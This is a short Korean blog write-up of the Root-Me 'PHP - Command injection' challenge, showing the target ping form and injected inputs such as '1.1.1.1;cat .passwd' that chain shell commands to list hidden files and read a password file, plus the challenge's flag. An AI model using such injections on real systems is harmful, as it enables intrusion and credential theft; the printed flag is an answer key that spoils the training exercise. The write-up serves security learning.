PHP - Command injection Write-up

[Solved in under 2 minutes]

3.1절 대체휴일로 월요일인데 쉰다 기분이 매우좋다.

나라를 위해 희생하신 분들 전부 항상 감사합니다.

가보자

이건 뭐 보자마자 그냥 OS Command Injection 이다 싶었다.

Ping 때리는 문제이다 -> 그냥 그렇다고 생각해라. 아닐수도 있지만 지금까지는 다른 문제 본 적 없다.

소스코드 볼 필요도 없지만 한번 보자

<html>
<head>
<title>Ping Service</title>
</head>
<body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
<form method="POST" action="index.php">
        <input type="text" name="ip" placeholder="127.0.0.1">
        <input type="submit">
</form>
<pre>
</pre>
</body>
</html>

역시나 볼게 없다.

바로 공격해보자.

1.1.1.1;ls

역시나 바로 보인다.

기본적으로 이렇게 보이고 flag를 찾는거면 /(루트) 밑이나 /etc/passwd를 보면 있는데 없어서 조금 헤맸다.

그러다가 다시 처음으로 돌아와 숨은 파일이 있나 싶어서 했는데

아니나 다를까,

1.1.1.1;ls -al

대놓고 나 답이요. 이런애가 숨어있다.

한번 보자

1.1.1.1;cat .passwd

역시나 답이다.

ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ 답 ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ

S3rv1ceP1n9Sup3rS3cure

ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ

이런 유형의 문제를 많이 풀다보니 뭐 기법들은 되게 많다.
여러모로 방식이 많으니 참고하자.

RootMe PHP - Command injection Write-up

이상 보고 끝!